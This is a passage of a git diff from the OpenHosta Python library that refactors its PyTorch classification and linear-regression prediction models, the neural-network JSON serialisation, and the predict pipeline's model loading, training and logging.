- # Define simple fully connected architecture
- self.layers.append(nn.Linear(input_size, input_layer))
- self.layers.append(nn.ReLU()) # Apply ReLU after first layer
- self.layers.append(nn.Linear(input_layer, hidden_layer_1))
- self.layers.append(nn.ReLU()) # Apply ReLU after second layer
- self.layers.append(nn.Linear(hidden_layer_1, output_size))
- else:
- # Use custom user-defined layers from neural network definition if available
- self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+            layer_size: list = get_algo_architecture(input_size, output_size, self.complexity, self.growth_rate, self.max_layer_coefficent)
+
+ layers = []
+ for i in range(len(layer_size) - 1):
+ in_features = layer_size[i]
+ out_features = layer_size[i + 1]
- for i, layer in enumerate(self.layers):
- setattr(self, f'fc{i + 1}', layer)
+ linear_layer = nn.Linear(in_features, out_features)
+ layers.append(linear_layer)
+
+ if i < len(layer_size) - 2:
+ activation = nn.ReLU()
+ layers.append(activation)
+ self.model = nn.Sequential(*layers)
+ else:
+ layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+ self.model = nn.Sequential(*layers)
- # Set the loss function for classification
if neural_network is None or neural_network.loss_function is None:
- if num_classes == 2:
- self.loss = nn.BCEWithLogitsLoss() # For binary classification
- else:
- self.loss = nn.CrossEntropyLoss() # For multi-class classification
+ self.loss = nn.CrossEntropyLoss()
else:
self.loss = custom_loss_to_pytorch(neural_network.loss_function)
- # Set the optimizer
if neural_network is None or neural_network.optimizer is None:
- self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ self.optimizer = optim.AdamW(self.parameters(), lr=0.001)
else:
- self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
+ self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001) # TODO: Add learning rate parameter
+
+ self.scheduler = StepLR(self.optimizer, step_size=10, gamma=0.1)
- # Move model to the selected device (CPU or GPU)
self.to(self.device)
def trainer(self, train_set, epochs):
+ """
+ Train the model on the training set for a classification task
+ """
self.train()
for epoch in range(epochs):
+
running_loss = 0.0
- correct = 0
- total = 0
+ correct_predictions = 0
+ total_samples = 0
+
for inputs, labels in train_set:
- inputs, labels = inputs.to(self.device), labels.to(self.device)
+ inputs = inputs.to(self.device)
+                labels = labels.to(self.device).long()  # CrossEntropyLoss expects long (int64) class labels
+ batch_size = inputs.size(0)
- # Zero parameter gradients
self.optimizer.zero_grad()
-
- # Forward pass
- outputs = self(inputs)
-
- if self.num_classes == 2:
- preds = (torch.sigmoid(outputs) > 0.5).float()
- else:
- preds = torch.argmax(outputs, dim=1)
-
- # Compute Loss
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
+
loss.backward()
self.optimizer.step()
running_loss += loss.item()
-
- # Calculate accuracy
- if self.num_classes == 2:
- correct += (preds == labels).sum().item()
- else:
- correct += (preds == labels.argmax(dim=1)).sum().item()
-
- total += labels.size(0)
-
- accuracy = correct / total
- if self.verbose:
- print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set):.4f}, Accuracy: {accuracy * 100:.2f}%")
-
+ predicted_classes = torch.argmax(outputs, dim=1)
+
+ correct_predictions += (predicted_classes == labels).sum().item()
+ total_samples += batch_size
+
+ self.scheduler.step()
+ current_lr = self.optimizer.param_groups[0]['lr']
+
+ epoch_loss = running_loss / len(train_set)
+ epoch_accuracy = (correct_predictions / total_samples) * 100
+            # Overwrite the progress line in place, but keep the final epoch's line
+            one_line = epoch != epochs - 1
+            self.logger.log_custom("Epoch", f"{epoch + 1}/{epochs}, Loss: {epoch_loss:.4f}, Accuracy: {epoch_accuracy:.2f}%, LR: {current_lr:.6f}",
+                                   color=ANSIColor.CYAN, level=1, one_line=one_line)
+
def validate(self, validation_set):
- """Validate the model's performance"""
- self.eval() # Set model to evaluation mode
+ """
+ Validate the model on the validation set for a classification task.
+ """
+ self.eval()
validation_loss = 0.0
- correct = 0
- total = 0
+ correct_predictions = 0
+ total_samples = 0
+
with torch.no_grad():
for inputs, labels in validation_set:
- inputs, labels = inputs.to(self.device), labels.to(self.device)
- outputs = self(inputs)
+ inputs = inputs.to(self.device)
+                labels = labels.to(self.device).long()  # CrossEntropyLoss expects long (int64) class labels
+ batch_size = inputs.size(0)
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
- validation_loss += loss.item()
+ validation_loss += loss.item() * batch_size
- # For Classification Metrics (like binary or multi-class accuracy)
- if self.num_classes == 2:
- # Binary classification: Apply sigmoid and threshold at 0.5
- preds = (torch.sigmoid(outputs) > 0.5).float()
- correct += (preds == labels).sum().item()
- else:
- # Multi-class classification: Use argmax to get class labels
- preds = torch.softmax(outputs, dim=1)
- correct += (preds == labels.argmax(dim=1)).sum().item()
+ predicted_classes = torch.argmax(outputs, dim=1)
- total += labels.size(0)
+ correct_predictions += (predicted_classes == labels).sum().item()
+ total_samples += labels.size(0)
- avg_val_loss = validation_loss / len(validation_set)
- accuracy = correct / total
- print(f"Validation Loss: {avg_val_loss:.4f}, Accuracy: {accuracy * 100:.2f}%")
+ avg_val_loss = validation_loss / total_samples
+ accuracy = (correct_predictions / total_samples) * 100
- return avg_val_loss, accuracy
+ self.logger.log_custom("Validation", f"Loss: {avg_val_loss:.4f}, Accuracy: {accuracy:.2f}%", color=ANSIColor.CYAN, level=1)
+        return  # No return value needed for now
def inference(self, x):
- """Make prediction on a _inputs inference the model"""
+ """
+ Make prediction on inputs using the model.
+ """
self.eval()
with torch.no_grad():
x = x.to(self.device)
- outputs = self(x)
- if self.num_classes == 2:
- prediction = (torch.sigmoid(outputs) > 0.5).float()
- else:
- prediction = torch.softmax(outputs, dim=1)
- return prediction.cpu()
+
+ # Add batch dimension if needed
+ if x.dim() == 1:
+ x = x.unsqueeze(0)
+
+ outputs = self.model(x)
+
+ probabilities = torch.softmax(outputs, dim=1)
+
+ return probabilities.cpu()
\ No newline at end of file
diff --git a/src/OpenHosta/exec/predict/model/builtins/linear_regression.py b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
index 9838899..135cd43 100644
--- a/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
+++ b/src/OpenHosta/exec/predict/model/builtins/linear_regression.py
@@ -3,95 +3,155 @@
import torch
from torch import nn
from torch import optim
+from torch.optim.lr_scheduler import StepLR
+from .algo_architecture import get_algo_architecture
from ..hosta_model import HostaModel
from ..neural_network import NeuralNetwork
+from ..neural_network_types import ArchitectureType
+from ....predict.predict_config import PredictConfig
from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
+from .....core.logger import Logger, ANSIColor
class LinearRegression(HostaModel):
- def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, device: Optional[str] = None):
+ def __init__(
+ self,
+ neural_network: Optional[NeuralNetwork],
+ input_size: int,
+ output_size: int,
+ config: PredictConfig,
+ logger: Logger,
+ device: Optional[str] = None
+ ):
super().__init__(device)
- self.complexity = complexity
+ self.complexity = config.complexity
+ self.logger = logger
+ self.device = device
+ self.growth_rate = config.growth_rate
+ self.max_layer_coefficent = config.coef_layers
+ self.architecture_type = ArchitectureType.LINEAR_REGRESSION
- self.layers = []
if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
- transition_value = int(((input_size * output_size) / 2) * self.complexity)
-
- input_layer = int(input_size * (2 * self.complexity))
- if input_size > output_size:
- hidden_layer_1 = int(transition_value / output_size)
- else:
- hidden_layer_1 = transition_value
-
- self.layers.append(nn.Linear(input_size, input_layer))
- self.layers.append(nn.ReLU())
- self.layers.append(nn.Linear(input_layer, hidden_layer_1))
- self.layers.append(nn.ReLU())
- self.layers.append(nn.Linear(hidden_layer_1, output_size))
- else:
- self.layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+            layer_size: list = get_algo_architecture(input_size, output_size, self.complexity, self.growth_rate, self.max_layer_coefficent)
+
+ layers = []
+ for i in range(len(layer_size) - 1):
+ in_features = layer_size[i]
+ out_features = layer_size[i + 1]
+
+ linear_layer = nn.Linear(in_features, out_features)
+ layers.append(linear_layer)
- for i, layer in enumerate(self.layers):
- setattr(self, f'fc{i + 1}', layer)
+ if i < len(layer_size) - 2:
+ activation = nn.ReLU()
+ layers.append(activation)
+ self.model = nn.Sequential(*layers)
+ else:
+ layers = [custom_layer_to_pytorch(layer) for layer in neural_network.layers]
+ self.model = nn.Sequential(*layers)
+
- # Set the loss function
if neural_network is None or neural_network.loss_function is None:
- self.loss = nn.MSELoss()
+ self.loss = nn.SmoothL1Loss()
else:
self.loss = custom_loss_to_pytorch(neural_network.loss_function)
- # Set the optimizer
if neural_network is None or neural_network.optimizer is None:
- self.optimizer = optim.Adam(self.parameters(), lr=0.001)
+ self.optimizer = optim.AdamW(self.parameters(), lr=0.01, weight_decay=1e-2)
else:
self.optimizer = custom_optimizer_to_pytorch(neural_network.optimizer, self, lr=0.001)
- # Move model to the selected device (CPU or GPU)
+ self.scheduler = StepLR(self.optimizer, step_size=10, gamma=0.1)
+
self.to(self.device)
- def trainer(self, train_set, epochs, verbose=False):
+ def trainer(self, train_set, epochs):
+ """
+ Training loop for regression models.
+ Includes accuracy calculation with a tolerance (epsilon).
+ """
+ epsilon = 0.1
self.train()
for epoch in range(epochs):
running_loss = 0.0
+ correct_predictions = 0
+ total_samples = 0
+
for inputs, labels in train_set:
- # Move _inputs and labels to the right device
- inputs, labels = inputs.to(self.device), labels.to(self.device)
+ inputs = inputs.to(self.device)
+ labels = labels.to(self.device).float().view(-1, 1) # Ensure proper shape and type
+ batch_size = labels.size(0)
- # Zero the parameter gradients
self.optimizer.zero_grad()
-
- # Forward pass
- outputs = self(inputs)
-
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
- # Backward pass and update
loss.backward()
self.optimizer.step()
running_loss += loss.item()
- # if verbose:
- print(f"Epoch {epoch + 1}/{epochs}, Loss: {running_loss / len(train_set)}")
+
+ correct_predictions += ((outputs - labels).abs() < epsilon).sum().item()
+ total_samples += batch_size
+
+ self.scheduler.step()
+ current_lr = self.optimizer.param_groups[0]['lr']
+
+ epoch_loss = running_loss / len(train_set)
+ epoch_accuracy = (correct_predictions / total_samples) * 100
+            # Overwrite the progress line in place, but keep the final epoch's line
+            one_line = epoch != epochs - 1
+            self.logger.log_custom("Epoch", f"{epoch + 1}/{epochs}, Loss: {epoch_loss:.4f}, Accuracy: {epoch_accuracy:.2f}%, LR: {current_lr:.6f}",
+                                   color=ANSIColor.CYAN, level=1, one_line=one_line)
+
+
def validate(self, validation_set):
- """Validate the model on a given validation set."""
- self.eval() # Set model to eval mode (disable dropout, etc.)
+ """
+ Validate the model on a given validation set for regression models.
+ Includes accuracy calculation with a tolerance (epsilon).
+ """
+ self.eval()
validation_loss = 0.0
- with torch.no_grad(): # No need to track gradients during validation
+ correct_predictions = 0
+ total_samples = 0
+ epsilon = 0.1
+
+ with torch.no_grad():
for inputs, labels in validation_set:
- inputs, labels = inputs.to(self.device), labels.to(self.device)
- outputs = self(inputs)
+ inputs = inputs.to(self.device)
+ labels = labels.to(self.device).float().view(-1, 1)
+ batch_size = labels.size(0)
+
+ outputs = self.model(inputs)
loss = self.loss(outputs, labels)
- validation_loss += loss.item()
- return validation_loss / len(validation_set)
+ validation_loss += loss.item() * batch_size
+
+ correct_predictions += ((outputs - labels).abs() < epsilon).sum().item()
+ total_samples += batch_size
+
+        avg_val_loss = validation_loss / total_samples  # loss was accumulated per sample above
+ accuracy = (correct_predictions / total_samples) * 100
+
+ self.logger.log_custom("Validation", f"Loss: {avg_val_loss:.4f}, Accuracy: {accuracy:.2f}%", color=ANSIColor.CYAN, level=1, one_line=False)
+
+        return  # No return value needed for now
+
def inference(self, x):
- """Make predictions for the given test set."""
+ """
+ Make predictions on a given input for linear regression task.
+ """
self.eval()
with torch.no_grad():
x = x.to(self.device)
- outputs = self(x)
+
+ if x.dim() == 1:
+ x = x.unsqueeze(0)
+
+ outputs = self.model(x)
+
return outputs
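The epsilon-tolerance "accuracy" that `trainer` and `validate` compute above can be sketched without torch (the 0.1 tolerance mirrors the hard-coded `epsilon`; the function name is illustrative):

```python
def tolerance_accuracy(outputs, labels, epsilon=0.1):
    """Fraction of predictions within +/- epsilon of their target."""
    correct = sum(1 for out, lab in zip(outputs, labels) if abs(out - lab) < epsilon)
    return correct / len(labels)

# Two of the three predictions fall inside the 0.1 band
acc = tolerance_accuracy([1.05, 2.5, 3.02], [1.0, 2.0, 3.0])  # -> 2/3
```

Note this is a loose proxy for regression quality: it depends on the output scale, so with `config.normalize` disabled the same epsilon can mean very different things across datasets.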
diff --git a/src/OpenHosta/exec/predict/model/hosta_model.py b/src/OpenHosta/exec/predict/model/hosta_model.py
index 08df057..8a3338c 100644
--- a/src/OpenHosta/exec/predict/model/hosta_model.py
+++ b/src/OpenHosta/exec/predict/model/hosta_model.py
@@ -3,21 +3,24 @@
import torch
from torch import nn
+from .neural_network_types import ArchitectureType
class HostaModel(ABC, nn.Module):
def __init__(self, device: Optional[str]):
self.device = device if device is not None else ('cuda' if torch.cuda.is_available() else 'cpu')
self.layers = []
+ self.architecture_type: Optional[ArchitectureType] = None
super().__init__()
def trainer(self, train_set, epochs):
pass
def forward(self, x):
- for layer in self.layers:
- x = layer(x)
- return x
+        # Subclasses wrap their layers in an nn.Sequential stored in
+        # self.model and call it directly, so the base forward is a no-op.
+        pass
def validate(self, validation_set):
pass
@@ -30,4 +33,4 @@ def init_weights(self, path: str):
self.eval()
def save_weights(self, path: str):
- torch.save(self.state_dict(), path, )
+ torch.save(self.state_dict(), path)
diff --git a/src/OpenHosta/exec/predict/model/model_provider.py b/src/OpenHosta/exec/predict/model/model_provider.py
index dc221c2..127580b 100644
--- a/src/OpenHosta/exec/predict/model/model_provider.py
+++ b/src/OpenHosta/exec/predict/model/model_provider.py
@@ -7,28 +7,52 @@
from .neural_network_types import ArchitectureType
from ..predict_config import PredictConfig
from ....core.hosta import Func
+from ....core.logger import Logger, ANSIColor
from ....utils.torch_nn_utils import type_size
class HostaModelProvider:
@staticmethod
- def from_hosta_func(func: Func, config: Optional[PredictConfig], architecture: Optional[NeuralNetwork], path: str, verbose: int) -> Optional[HostaModel]:
+ def from_hosta_func(func: Func, config: Optional[PredictConfig], architecture: Optional[NeuralNetwork], path: str, logger: Logger) -> Optional[HostaModel]:
input_size = 0
for arg in func.f_type[0]:
- input_size += type_size(arg, config.max_tokens)
+ if get_origin(arg) is Literal:
+ input_size += 1
+ else:
+ input_size += type_size(arg, config.max_tokens)
+
output_size = type_size(func.f_type[1], config.max_tokens)
+ logger.log_debug(f"Model with input size {input_size} and output size {output_size}", level=2)
+
hosta_model: Optional[HostaModel] = None
- if config is not None and config.model_type is not None:
- if config.model_type == ArchitectureType.LINEAR_REGRESSION:
- hosta_model = LinearRegression(architecture, input_size, output_size, config.complexity)
- elif config.model_type == ArchitectureType.CLASSIFICATION:
- hosta_model = Classification(architecture, input_size, output_size, config.complexity, 1)
+ model_type = determine_model_type(func)
+
+ if model_type == ArchitectureType.LINEAR_REGRESSION:
+ hosta_model = LinearRegression(architecture, input_size, output_size, config, logger)
+
+ elif model_type == ArchitectureType.CLASSIFICATION:
+ hosta_model = Classification(architecture, input_size, output_size, config, logger)
else:
- if get_origin(func.f_type[1]) == Literal:
- hosta_model = Classification(architecture, input_size, output_size, 4, 1)
- else:
- hosta_model = LinearRegression(architecture, input_size, output_size, 4)
+ raise ValueError(f"Model type {model_type} not supported")
+
+ logger.log_custom("Model", f"Type : {type(hosta_model).__name__}", color=ANSIColor.BLUE_BOLD)
+
+
+ if architecture is None:
+ save_architecture(hosta_model, path, logger)
- with open(path, 'w') as file:
- file.write(NeuralNetwork.from_torch_nn(hosta_model).to_json())
return hosta_model
+
+
+def determine_model_type(func: Func) -> ArchitectureType:
+ if get_origin(func.f_type[1]) is Literal:
+ return ArchitectureType.CLASSIFICATION
+ else:
+ return ArchitectureType.LINEAR_REGRESSION
+
+
+def save_architecture(hosta_model: HostaModel, path: str, logger: Logger):
+ architecture = NeuralNetwork.from_torch_nn(hosta_model)
+ with open(path, 'w', encoding='utf-8') as file:
+ file.write(architecture.to_json())
+ logger.log_custom("Architecture", f"saved to {path}", color=ANSIColor.BRIGHT_GREEN, level=2)
\ No newline at end of file
diff --git a/src/OpenHosta/exec/predict/model/neural_network.py b/src/OpenHosta/exec/predict/model/neural_network.py
index ae61278..65e366f 100644
--- a/src/OpenHosta/exec/predict/model/neural_network.py
+++ b/src/OpenHosta/exec/predict/model/neural_network.py
@@ -4,7 +4,7 @@
from torch import nn
from .neural_network_types import LayerType, OptimizerAlgorithm, LossFunction, Layer
-from ....utils.torch_nn_utils import pytorch_layer_to_custom, pytorch_loss_to_custom, pytorch_optimizer_to_custom
+from ....utils.torch_nn_utils import pytorch_layer_to_custom, pytorch_loss_to_custom, pytorch_optimizer_to_custom, custom_layer_to_pytorch
class NeuralNetwork:
@@ -15,6 +15,7 @@ def __init__(self):
self.layers: list[Layer] = []
self.loss_function: Optional[LossFunction] = None
self.optimizer: Optional[OptimizerAlgorithm] = None
+ self._type = "UNDEFINED"
def add_layer(self, layer: Layer):
"""
@@ -61,6 +62,7 @@ def to_json(self) -> str:
:rtype: str
"""
network_dict = {
+ "type": self._type,
"layers": [
layer.to_json()
for layer in self.layers
@@ -85,22 +87,33 @@ def from_json(cls, json_str: str) -> 'NeuralNetwork':
"""
try:
network_dict = json.loads(json_str)
- network = cls()
+ except json.JSONDecodeError as e:
+ raise ValueError(f"Invalid JSON: {e}")
- if network_dict.get("loss_function", None) is not None:
- network.loss_function = LossFunction[network_dict.get("loss_function", None)]
- else:
- network.loss_function = None
+ network = cls()
- if network_dict.get("optimizer", None) is not None:
- network.optimizer = OptimizerAlgorithm[network_dict.get("optimizer", None)]
- else:
- network.optimizer = None
+ # Set loss function
+ loss_fn_name = network_dict.get("loss_function")
+ if loss_fn_name:
+ try:
+ network.loss_function = LossFunction[loss_fn_name]
+ except KeyError:
+ raise ValueError(f"Unsupported loss function: {loss_fn_name}")
+
+ # Set optimizer
+ optimizer_name = network_dict.get("optimizer")
+ if optimizer_name:
+ try:
+ network.optimizer = OptimizerAlgorithm[optimizer_name]
+ except KeyError:
+ raise ValueError(f"Unsupported optimizer: {optimizer_name}")
- # Add layers
- for layer_dict in network_dict.get("layers", []):
+ # Add layers
+ for layer_dict in network_dict.get("layers", []):
+ try:
+ layer_type = LayerType[layer_dict["layer_type"]]
layer = Layer(
- layer_type=LayerType[layer_dict.get("layer_type", None)],
+ layer_type=layer_type,
in_features=layer_dict.get("in_features"),
out_features=layer_dict.get("out_features"),
kernel_size=layer_dict.get("kernel_size"),
@@ -109,11 +122,12 @@ def from_json(cls, json_str: str) -> 'NeuralNetwork':
dropout=layer_dict.get("dropout")
)
network.add_layer(layer)
+ except KeyError as e:
+ raise ValueError(f"Missing key in layer definition: {e}")
+ except ValueError as e:
+ raise ValueError(f"Invalid value in layer definition: {e}")
- return network
-
- except (json.JSONDecodeError, KeyError, ValueError) as e:
- raise ValueError(f"Invalid JSON configuration: {str(e)}")
+ return network
@classmethod
@@ -130,13 +144,13 @@ def from_torch_nn(cls, torch_model: nn.Module, loss_fn=None, optimizer=None) ->
network = cls()
# Iterating through the PyTorch model's children (layers)
- for layer in torch_model.children():
- try:
- nn_layer = pytorch_layer_to_custom(layer)
+        for layer in torch_model.model.children():  # assumes the wrapped nn.Sequential is stored in the model's "model" attribute
+ nn_layer = pytorch_layer_to_custom(layer)
+ if nn_layer is not None:
network.add_layer(nn_layer)
- except ValueError as e:
- # print(f"Skipping unsupported layer: {e}")
+ else:
pass
+ # print(f"Skipping unsupported layer: {e}")
# Set loss function and optimizer if specified
if loss_fn is not None:
@@ -153,3 +167,19 @@ def from_torch_nn(cls, torch_model: nn.Module, loss_fn=None, optimizer=None) ->
print(f"Skipping unsupported optimizer: {e}")
return network
+
+ def to_pytorch_sequential_model(self) -> nn.Sequential:
+ """
+ Convert the NeuralNetwork instance to a PyTorch nn.Sequential model.
+
+ :return: A PyTorch nn.Sequential model.
+ """
+ layers = []
+ for layer in self.layers:
+ try:
+ pytorch_layer = custom_layer_to_pytorch(layer)
+ if pytorch_layer is not None:
+ layers.append(pytorch_layer)
+ except ValueError as e:
+ print(f"Skipping unsupported layer: {e}")
+ return nn.Sequential(*layers)
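For context, `get_algo_architecture` (imported at the top of both builtins but not included in this patch) returns the list of layer widths that the construction loops turn into `nn.Linear` modules. One plausible sketch of such a generator, under assumed growth/cap rules (the real implementation may differ):

```python
def get_algo_architecture(input_size, output_size, complexity,
                          growth_rate, max_layer_coefficient):
    """Hypothetical sketch: hidden widths grow geometrically by growth_rate,
    capped at input_size * max_layer_coefficient, then connect to the output."""
    cap = max(input_size * max_layer_coefficient, input_size)
    sizes = [input_size]
    width = input_size
    for _ in range(complexity):
        width = min(int(width * growth_rate), cap)
        sizes.append(width)
    sizes.append(output_size)
    return sizes

get_algo_architecture(4, 2, 2, 2.0, 4)  # -> [4, 8, 16, 2]
```

Whatever the real rule is, the consuming loops only require that the list starts at `input_size` and ends at `output_size`.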
diff --git a/src/OpenHosta/exec/predict/model/neural_network_types.py b/src/OpenHosta/exec/predict/model/neural_network_types.py
index 1baae4d..a6d576b 100644
--- a/src/OpenHosta/exec/predict/model/neural_network_types.py
+++ b/src/OpenHosta/exec/predict/model/neural_network_types.py
@@ -85,8 +85,8 @@ class Layer:
Initialize a Layer object.
:param layer_type: The type of the layer.
- :param in_features: Number of _inputs features or channels.
- :param out_features: Number of _outputs features or channels.
+    :param in_features: Number of input features or channels.
+    :param out_features: Number of output features or channels.
:param kernel_size: Size of the kernel/filter.
:param stride: Stride of the kernel/filter.
:param padding: Padding added to the _inputs.
diff --git a/src/OpenHosta/exec/predict/predict.py b/src/OpenHosta/exec/predict/predict.py
index c5d7e2f..292b229 100644
--- a/src/OpenHosta/exec/predict/predict.py
+++ b/src/OpenHosta/exec/predict/predict.py
@@ -1,21 +1,23 @@
import os
-from typing import Union, Optional
+from typing import Union, Optional, Literal
from .dataset.dataset import HostaDataset, SourceType
from .dataset.oracle import LLMSyntheticDataGenerator
from .model import HostaModel
from .model.model_provider import HostaModelProvider
from .model.neural_network import NeuralNetwork
+from .model.neural_network_types import ArchitectureType
from .predict_config import PredictConfig
from .predict_memory import PredictMemory, File
from ...core.config import Model, DefaultModel
from ...core.hosta import Hosta, Func
+from ...core.logger import Logger, ANSIColor
def predict(
config: PredictConfig = PredictConfig(),
oracle: Optional[Union[Model, HostaDataset]] = None,
- verbose: int = 0
+ verbose: Union[Literal[0, 1, 2], bool] = 2
) -> Union[int, float, bool, str]:
"""
Predicts a result using an existing model or by creating a new one.
@@ -28,133 +30,168 @@ def predict(
Returns:
Model prediction
"""
- assert config is not None, "Please provide a valid configuration not None"
- assert verbose is not None and 0 <= verbose <= 2, "Please provide a valid verbose level (0, 1 or 2) default is 0"
- func: Func = getattr(Hosta(), "_infos")
+    assert config is not None, "Please provide a valid, non-None configuration"
+ x = Hosta()
+ func: Func = getattr(x._update_call(), "_infos")
+
name = config.name if config and config.name else str(func.f_name)
base_path = config.path if config and config.path else os.getcwd()
memory: PredictMemory = PredictMemory.load(base_path=base_path, name=name)
- dataset: Optional[HostaDataset] = None
-
- hosta_model: HostaModel = get_hosta_model(memory.architecture, func, config, verbose)
- if verbose == 2:
- print(f"[\033[92mArchitecture\033[0m] loaded, type : {type(hosta_model).__name__}")
-
- if not load_weights(memory, hosta_model, verbose):
- train_model(config, memory, hosta_model, dataset, oracle, func, verbose)
+ logger: Logger = Logger(log_file_path=memory.summary.path, verbose=verbose)
+
+ dataset: Optional[HostaDataset] = getattr(func.f_obj, "_dataset", None)
+
+ hosta_model: HostaModel = get_hosta_model(func, memory.architecture, logger, config)
+
+ if not load_weights(x, memory, hosta_model, logger):
+ train_model(config, memory, hosta_model, oracle, func, logger)
if dataset is None:
- dataset = HostaDataset.from_input(func.f_args, verbose)
+ dataset = HostaDataset.from_input(func.f_args, logger, config.max_tokens, func, memory.dictionary.path)
+ x.attach(func.f_obj, {"_dataset": dataset})
else:
- dataset.prepare_inference(func.f_args)
+ dataset.prepare_inference(func.f_args, config.max_tokens, func, memory.dictionary.path)
+
+ if not hasattr(func.f_obj, "_model"):
+ setattr(func, "_model", hosta_model)
+
+ if config.normalize:
+ dataset.normalize_input_inference(memory.normalization)
torch_prediction = hosta_model.inference(dataset.inference.input)
- prediction = dataset.decode(torch_prediction, func_f_type=func.f_type[1])
- if predict is list:
- return prediction[0]
- else:
- return prediction
+ if config.normalize:
+ torch_prediction = dataset.denormalize_output_inference(torch_prediction, memory.normalization)
+ output, prediction = dataset.decode(torch_prediction, func_f_type=func.f_type)
+ logger.log_custom("Prediction", f"{prediction} -> {output}", color=ANSIColor.BLUE_BOLD, level=1)
+ return output
-def get_hosta_model(architecture_file: File, func: Func, config: Optional[PredictConfig] = None, verbose: int = 0) -> HostaModel:
+def get_hosta_model(func: Func, architecture_file: File, logger: Logger, config: Optional[PredictConfig] = None) -> HostaModel:
"""
Load or create a new model.
"""
- architecture: Optional[NeuralNetwork] = None
+ if hasattr(func.f_obj, "_model"):
+ return getattr(func.f_obj, "_model")
+
+    architecture: Optional[NeuralNetwork] = load_architecture(architecture_file, logger)
+
+    model = HostaModelProvider.from_hosta_func(func, config, architecture, architecture_file.path, logger)
+    return model
+
+def load_architecture(architecture_file: File, logger: Logger) -> Optional[NeuralNetwork]:
+ """
+ Load the architecture if it exists.
+ """
if architecture_file.exist:
- with open(architecture_file.path, "r") as file:
+ with open(architecture_file.path, 'r', encoding='utf-8') as file:
json = file.read()
- architecture = NeuralNetwork.from_json(json)
- if verbose == 2:
- print(f"[\033[92mArchitecture\033[0m] found at {architecture_file.path}")
- else:
- if verbose == 2:
- print(f"[\033[93mArchitecture\033[0m] not found, creating one")
- return HostaModelProvider.from_hosta_func(func, config, architecture, architecture_file.path, verbose)
-
+ logger.log_custom("Architecture", f"found at {architecture_file.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+ return NeuralNetwork.from_json(json)
+    else:
+ logger.log_custom("Architecture", "not found", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ return None
-def load_weights(memory: PredictMemory, hosta_model: HostaModel, verbose :int) -> bool:
+def load_weights(x: Hosta, memory: PredictMemory, hosta_model: HostaModel, logger: Logger) -> bool:
"""
Load weights if they exist.
"""
- if memory.weights.exist:
+ # if hasattr(x._infos.f_obj, "_weights_loaded"):
+ # return True
- if verbose == 2:
- print(f"[\033[92mWeights\033[0m] found at {memory.weights.path}")
+ if memory.weights.exist:
+ logger.log_custom("Weights", f"found at {memory.weights.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
hosta_model.init_weights(memory.weights.path)
+ x.attach(x._infos.f_obj, {"_weights_loaded": True})
return True
- if verbose == 2:
- print(f"[\033[92mWeights\033[0m] not found generate new ones")
- return False
+ logger.log_custom("Weights", "not found", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ return False
-def train_model(config: PredictConfig, memory: PredictMemory, model: HostaModel, dataset: HostaDataset, oracle: Optional[Union[Model, HostaDataset]], func: Func, verbose: int) -> None:
+def train_model(config: PredictConfig, memory: PredictMemory, model: HostaModel, oracle: Optional[Union[Model, HostaDataset]], func: Func, logger: Logger) -> None:
"""
Prepare the data and train the model.
"""
if memory.data.exist:
- if verbose == 2:
- print(f"[\033[92mData\033[0m] found at {memory.data.path}")
- train_set, val_set = HostaDataset.from_data(memory.data.path, batch_size=1, shuffle=True, train_set_size=0.8, verbose=verbose) # verbose will prcess all the example and add it to val_set
+ logger.log_custom("Data", f"found at {memory.data.path}", color=ANSIColor.BRIGHT_GREEN, level=2)
+ dataset = HostaDataset.from_data(memory.data.path, logger=logger)
+ if config.batch_size is None:
+ config.batch_size = max(1, min(16384, int(0.05 * len(dataset.data))))
+
+ train_set, val_set = dataset.to_dataloaders(batch_size=config.batch_size, shuffle=True, train_ratio=0.8)
+
else:
- if verbose == 2:
- print(f"[\033[93mData\033[0m] not processed, preparing data")
- train_set, val_set = prepare_dataset(config, memory, dataset, func, oracle, verbose)
+ logger.log_custom("Data", "not found", color=ANSIColor.BRIGHT_YELLOW, level=2)
+ train_set, val_set = prepare_dataset(config, memory, func, oracle, model, logger)
+
+ logger.log_custom("Training", f"epochs: {config.epochs}, batch_size: {config.batch_size}, train_set size: {len(train_set)}, val_set size: {len(val_set)}", color=ANSIColor.BRIGHT_YELLOW, level=2)
if config.epochs is None:
config.epochs = int(2 * len(train_set.dataset) / config.batch_size if config.batch_size != len(train_set.dataset)\
else 2 * len(train_set.dataset))
assert config.epochs > 0, f"epochs must be greater than 0 now it's {config.epochs}"
-
+
model.trainer(train_set, epochs=config.epochs)
- if verbose > 0:
+ if logger.verbose >= 1:
model.validate(val_set)
-
+
+
model.save_weights(memory.weights.path)
-def prepare_dataset(config: PredictConfig, memory: PredictMemory, dataset: HostaDataset, func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> tuple:
+def prepare_dataset(config: PredictConfig, memory: PredictMemory, func: Func, oracle: Optional[Union[Model, HostaDataset]], model: HostaModel, logger: Logger) -> tuple:
"""
Prepare the dataset for training.
"""
+
+ if config.dataset_path is None:
+ generated_data_path = os.path.join(memory.predict_dir, "generated_data.csv")
+ if os.path.exists(generated_data_path) and os.path.getsize(generated_data_path) > 0:
+ logger.log_custom("Dataset", "no data.json found, but found generated_data.csv, loading it", color=ANSIColor.BRIGHT_GREEN, level=2)
+ config.dataset_path = generated_data_path
+
if config.dataset_path is not None:
- if verbose == 2:
- print(f"[\033[92mDataset\033[0m] found at {config.dataset_path}")
- dataset = HostaDataset.from_files(config.dataset_path, SourceType.CSV, verbose) # or JSONL jsp comment faire la détection la
